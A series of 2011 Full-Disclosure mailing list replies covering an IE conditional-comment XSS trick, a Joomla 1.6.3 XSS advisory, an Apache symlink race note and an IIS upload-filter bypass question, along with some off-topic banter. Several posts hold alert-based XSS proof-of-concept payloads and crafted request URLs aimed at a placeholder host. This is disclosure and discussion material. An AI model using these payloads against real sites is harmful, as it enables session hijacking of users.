I think it's worth to note that MSIE expects an *expression* in the conditional (it's a feature). Hence even if you disable direct XSS, there still would probably be more ways an *expression* could be used to write HTML code. As such, I don't think they should be fixing this (since it is intended), but rather warn developers about it's existence. On the other hand, if developers are writing unfiltered HTML inside this conditional, I think there are worse issues than this. I've always believed in the philosophy of making browsers work as expected instead of expecting them to comply and fix my issues. Especially if the browser in question is Internet Explorer ;-). Cheers, Chris. On Mon, Aug 8, 2011 at 5:59 AM, CnCxzSec衰仔 cncxzh...@gmail.com wrote: this is a normal use, but !--[ifimg/onerror=alert(1) src=] is an unnormal use. IE should regard this as an HTML comment instead of a downlevel-hidden comment, so the HTML tags inside the COMMENT should not be evaled. On Mon, Aug 8, 2011 at 11:30 AM, Andrew Farmer andf...@gmail.com wrote: On 2011-08-07, at 19:53, CnCxzSec衰仔 wrote: hi all, here is an interesting trick to perform an xss attack with IE browsers. some rich text applications such as email and blog, may provide HTML uses but have a policy to block the on-event execution to prevent the XSS attack. However, this applications may also allow the HTML notes uses,for instance !-- -- Any such applications are likely to also be vulnerable to a simpler attack based on downlevel-hidden conditional comments: !--[if IE] scriptanything you want can go here, presumably/script ![endif]-- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE handling the HTML notes incorrectly may lead to XSS attacks
Javascript: if(alert(1)); // executed i(alert(1)); // not executed (TypeError: i is not a function) It's worth to note that Firefox (5) does execute the inside function, whereas Chrome (13) and IE(9) do not. Talk about browser consistency... On Mon, Aug 8, 2011 at 9:38 AM, CnCxzSec衰仔 cncxzh...@gmail.com wrote: a good example to see the incorrect handling: !--[ifimg/onerror=alert(1) src=] //executed. !--[iimg/onerror=alert(1) src=]//not executed. On Mon, Aug 8, 2011 at 2:23 PM, Christian Sciberras uuf6...@gmail.comwrote: I think it's worth to note that MSIE expects an *expression* in the conditional (it's a feature). Hence even if you disable direct XSS, there still would probably be more ways an *expression* could be used to write HTML code. As such, I don't think they should be fixing this (since it is intended), but rather warn developers about it's existence. On the other hand, if developers are writing unfiltered HTML inside this conditional, I think there are worse issues than this. I've always believed in the philosophy of making browsers work as expected instead of expecting them to comply and fix my issues. Especially if the browser in question is Internet Explorer ;-). Cheers, Chris. On Mon, Aug 8, 2011 at 5:59 AM, CnCxzSec衰仔 cncxzh...@gmail.com wrote: this is a normal use, but !--[ifimg/onerror=alert(1) src=] is an unnormal use. IE should regard this as an HTML comment instead of a downlevel-hidden comment, so the HTML tags inside the COMMENT should not be evaled. On Mon, Aug 8, 2011 at 11:30 AM, Andrew Farmer andf...@gmail.com wrote: On 2011-08-07, at 19:53, CnCxzSec衰仔 wrote: hi all, here is an interesting trick to perform an xss attack with IE browsers. some rich text applications such as email and blog, may provide HTML uses but have a policy to block the on-event execution to prevent the XSS attack. However, this applications may also allow the HTML notes uses,for instance !-- -- Any such applications are likely to also be vulnerable to a simpler attack based on downlevel-hidden conditional comments: !--[if IE] scriptanything you want can go here, presumably/script ![endif]-- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x06
Don't kill his creativity. He's (cr|d)ying for some (self-presumed well-deserved) attention. On Sun, Aug 7, 2011 at 9:00 PM, Tavis Ormandy tav...@cmpxchg8b.com wrote: Herr E Balls mohsep.submissi...@googlemail.com wrote: Hi Guys! Edition six of MOHSEP is here with no technical issues (we hired mexican guy called manuel to run servers in latvia for us!). Link is here: http://mohsepblog.blogspot.com/2011/08/saturday-august-6th-2011.html I pity the fool who photoshopped me. -- - tav...@cmpxchg8b.com | pgp encrypted mail preferred --- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Encrypted files and the 5th amendment
Not to cut the chatter, but one question remains; where's the solution? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] EC-Council's Sanjay Bavisi Hacking Series: Identifying Target IPs and Monitoring Google IPs
You're kidding, right? If you feel like trolling, there's this *great* site: http://encyclopediadramatica.ch/ Stop wasting people's time. On Fri, Jul 8, 2011 at 9:41 PM, Ron Goldstien securitygeek...@gmail.comwrote: Hello hackers, here is EC-Council's Sanjay Jay Bavisi's Hacking Series video tutorial #1. Today, Jay shows you how to: 1. Identify your network speed 2. Find the IP addresses of your targets 3. Use Tracer T to find who is looking at any website 4. Use Tracer T to find who is viewing google at this moment 5. Monitor other people's network speeds As always friends, use this information for Certified Ethical Hacking (CEH) and Certified Ethical Spamming (CES) purposes only. Without further ado: http://www.youtube.com/watch?v=SXmv8quf_xM ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
I've tested the PoCs on 1.5.22 and some 1.0 sites, and I consistently get a 403 error. Perhaps by 1.6.3 and lower you meant 1.6.x? Cheers, Chris. On Tue, Jun 28, 2011 at 8:25 AM, YGN Ethical Hacker Group li...@yehg.netwrote: Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities 1. OVERVIEW Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues. 2. BACKGROUND Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. 3. VULNERABILITY DESCRIPTION Several parameters (QueryString, option, searchword) in Joomla! Core components (com_content, com_contact, com_newsfeeds, com_search) are not properly sanitized upon submission to the /index.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSION AFFECTED 1.6.3 and lower 5. PROOF-OF-CONCEPT/EXPLOIT component: com_contact , parameter: QueryString (Browser: All) === http://attacker.in/joomla163_noseo/index.php?option=com_contactview=categorycatid=26id=36Itemid=-1 scriptalert(/XSS/)/script component:com_content , parameter: QueryString (Browser: All) === http://attacker.in/joomla163_noseo/index.php?option=com_contentview=categoryid=19Itemid=260limit=10filter_order_Dir=limitstart=filter_order= scriptalert(/XSS/)/script component: com_newsfeeds , parameter: QueryString (Browser: All) = http://attacker.in/joomla163_noseo/index.php?option=com_newsfeedsview=categoryid=17whateverehere= scriptalert(/XSS/)/scriptItemid=253limit=10filter_order_Dir=ASCfilter_order=ordering parameter: option (Browser: All) http://attacker.in/joomla163_noseo/index.php?option= scriptalert(/XSS/)/scripttask=reset.request component: com_search, parameter: searchword (Browser: IE, Konqueror) = [REQUEST] POST /joomla163/index.php HTTP/1.1 Referer: http://attacker.in/joomla163/ User-Agent: Konqueror/4.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: attacker.in Accept-Encoding: gzip, deflate Content-Length: 125 option=com_searchsearchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253Etask=search [/REQUEST] This searchword XSS was identified via source code: http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg 6. IMPACT Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. 7. SOLUTION Upgrade to Joomla! 1.6.4 or higher 8. VENDOR Joomla! Developer Team http://www.joomla.org 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2011-05-26: notified vendor 2011-06-28: vendor released fix 2011-06-28: vulnerability disclosed 11. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS) Vendor Advisory URL: http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html XSS FAQ: http://www.cgisecurity.com/xss-faq.html OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-06-28] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
Rather than that, I'd say the dev team is out of sync with the security team.. On Tue, Jun 28, 2011 at 5:59 PM, Jacqui Caren-home jacqui.ca...@ntlworld.com wrote: On 28/06/2011 07:25, YGN Ethical Hacker Group wrote: Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities FYI 1.5.21 seems to be AOK. IMHO The Joomla team do not seem to grok the concept of regression testing and keep re-introducing the same XSS problems over and over :-) Jacqui ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FYI: Apache httpd NoFollowSymLink follows symlinks feature
I think you meant apache follows symlinks even when -FollowSymLinks is *not * set. Otherwise it doesn't seem to make sense? Cheers, Chris. On Fri, Jun 24, 2011 at 5:14 PM, halfdog m...@halfdog.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 For those, who did not already know: Due to specification, apache follows symlinks even when -FollowSymLinks is set, when the data is modified concurrently. This can be trivially shown as demonstrated in http://www.halfdog.net/Security/2011/ApacheNoFollowSymlinkTimerace/ . When performing host hardening, do not think, the -FollowSymLinks option alone will prevent you from symlink attacks. - -- http://www.halfdog.net/ PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFOBKnlxFmThv7tq+4RAssHAJ4jiIVCzRLrVFeR6NOXaMSnyOf17ACdEnop yY8Z4UJ9saIxDmDBy/KEZTI= =eNhL -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FYI: Apache httpd NoFollowSymLink follows symlinks feature
Ah, I see . For a moment I confused -FollowSymLinks with a shell parameter. My bad, Chris. On Fri, Jun 24, 2011 at 6:15 PM, Ferenc Kovacs tyr...@gmail.com wrote: On Fri, Jun 24, 2011 at 5:24 PM, Christian Sciberras uuf6...@gmail.com wrote: I think you meant apache follows symlinks even when -FollowSymLinks is not set. Otherwise it doesn't seem to make sense? -FollowSymLinks turns off the FollowSymLinks option without resetting the other Options. http://wiki.apache.org/httpd/FAQ#Why_do_my_Options_directives_not_have_the_desired_effect.3F Tyrael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASHX, ASMX or What?
You shouldn't filter against known files, but do the reverse, you should filter against known good files. Oh and the medium you decide to throw this data should have special checks against execution etc... On Fri, Jun 24, 2011 at 6:16 PM, Nahuel Grisolia nah...@bonsai-sec.comwrote: List, Imagine that you're in front of an insecure file upload in the context of an IIS6,7 (no ;.jpg :P) and the regex filtering the file is like: [anything].asp[anything] (yeah, my.aspirator.jpg is filtered hehe) No .aspx, no .asp and no .aspx;jpg even if the server is vulnerable... So... is there any way to bypass this control? Like uploading a malicious Webservice (can we simply upload a Webservice file? I think they need to be precomplied first) or something like that? Thanks a lot! regards, -- Nahuel Grisolia - C|EH Information Security Consultant Bonsai Information Security Project Leader http://www.bonsai-sec.com/ (+54-11) 4777-3107 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (fractal-Self__) : A theoretical introduction to Universe, Conscious Machines and Programming Ur-cells !!!
Fractal fractal fractal, even us that coined the concept can't keep it going forever. Seems evident that each subsystem looses key aspects of its parent, this might turn out to be a system flaw, or a constrained space. We might have discovered this flaw already and we might have been using all this time since nothing tells us the laws of our universe are true to its container (if at all). Chris. On Sun, Jun 12, 2011 at 10:13 PM, Michal Zalewski lcam...@coredump.cxwrote: Paradox are way of life... Hence, the goal here is to question every knowledge with reasoning and trying-not to build a static opinion on anything. But have you tried contacting the vendor first? /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/